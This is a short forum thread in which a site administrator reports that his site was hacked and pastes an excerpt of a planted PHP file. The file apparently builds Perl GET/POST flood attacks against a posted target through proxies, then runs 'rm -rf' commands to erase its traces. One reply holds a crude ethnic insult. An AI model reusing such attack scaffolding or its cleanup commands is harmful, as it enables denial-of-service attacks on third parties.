Results 1 to 4 of 4

Thread: Hacked

  1. #1
    Administrator TheCableVine's Avatar
    Join Date
    May 2008
    Location
    Idaho
    Posts
    2,943
    Years of Experience
    16
    Blog Entries
    2
    Rep Power
    134

    Default Hacked

    Got hacked today. I'm sure some/most of you noticed. I appreciate those who gave me a heads up on the situation. Today was a very hectic day for me so I wasn't able to get in here and take care of the problem as soon as I would have liked to.

    I changed my passwords and deleted some strange files that were in some of the root folders. I'm hoping that is the end of it for now.

    We'll be hacked again I suppose. That seems to be the norm these days.

    Thanks everyone for your patience.


    Steve
    "Change does not always equal progress."

  2. #2
    4Q2
    4Q2 is offline
    Senior Member 4Q2's Avatar
    Join Date
    May 2010
    Location
    Pine Barrens
    Posts
    107
    Years of Experience
    12
    Rep Power
    12

    Default Re: Hacked

    Yea, some personal info of mine was compromised after I logged in..............but not much damage done............not that I get involved in hate against my work place........but it sucks they have to know my PC was infected?!?

  3. #3
    Senior Member Enjoythefall's Avatar
    Join Date
    Feb 2011
    Location
    Top of the world.
    Posts
    170
    Years of Experience
    5
    Rep Power
    13

    Default Re: Hacked

    Turkish B*stards!

  4. #4
    Administrator TheCableVine's Avatar
    Join Date
    May 2008
    Location
    Idaho
    Posts
    2,943
    Years of Experience
    16
    Blog Entries
    2
    Rep Power
    134

    Default Re: Hacked

    Usually when this site gets hacked they download some kind of virus that attacks your personal computer and then everyones antivirus programs raise hell. This time that didn't happen. I found 4 pages that were downloaded onto the site. A new index.php which showed the site as normal but it called up the different pages that were added. rp.php, indx.php, service.pwd and datatime_class.php. I don't know what they did but they had some nasty looking words in them.

    These are php files and need to be run through a php engine before they execute so there is no worry about posting the language here. I've also removed some of the language so even if it was run through a php engine it wouldn't execute, you would see an error.

    Here is an excerpt:

    <?
    set_time_limit(0);

    cmdexec("killall -9 perl");


    /*
    @ ###############################
    @ Create a Get Attacker Perl File
    @ ###############################
    */
    if($_POST['method']=="get")

    $target = $_POST['target']
    $_POST['query'] = base64_decode($_POST['query'])
    //QueryString Checker
    $query = $_POST['query']

    //Create Array List of Posted Proxies
    $ProxyList = ProxyListMaker($_POST['proxy']);

    $attList = "";
    for($i=1;$i<=$_POST['process'];$i++){
    $attList .= "system(\"perl get.pl pr.txt &\");\n";


    PerlGetAttackMaker($target,$query,$_POST['time'])
    if( !fwrite(fopen("pr.txt", "w+"), $ProxyList) ) return false
    if( !fwrite(fopen("run.pl", "w+"), $attList) ) return false

    cmdexec("perl run.pl;rm -rf *.pl;rm -rf rp.php;rm -rf pr.txt");

    }
    /*
    @ ################################
    @ Create a Post Attacker Perl File
    @ ################################
    */
    if($_POST['method']=="post"){

    $target = $_POST['target'];
    //Create Array List of Posted Proxies
    $ProxyList = ProxyListMaker($_POST['proxy']);
    $_POST['query'] = base64_decode($_POST['query']);

    $attList = "";
    for($i=1;$i<=$_POST['process'];$i++){
    $attList .= "system(\"perl post.pl pr.txt &\");\n";
    }

    PerlPostAttackMaker( $target, $_POST['query'], $_POST['time'] );
    if( !fwrite(fopen("pr.txt", "w+"), $ProxyList) ) return false
    if( !fwrite(fopen("run.pl", "w+"), $attList) ) return false
    cmdexec("perl run.pl;rm -rf *.pl;rm -rf rp.php;rm -rf pr.txt")
    }
    /*
    @ ################################
    @ Create a UDP Attacker Perl File
    @ ################################
    */
    I don't know what all of this means but it doesn't look good.

    So anyway, all is good now.

    I will be changing my password weekly so this doesn't happen again. Or, at least cuts down the possibility of it happening again.

    I don't know what personal information was compromised, I'd be interested to know so I can check to see if mine was as well. I don't know how to check to see if anything was compromised.

    Thanks
    Steve
    "Change does not always equal progress."

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •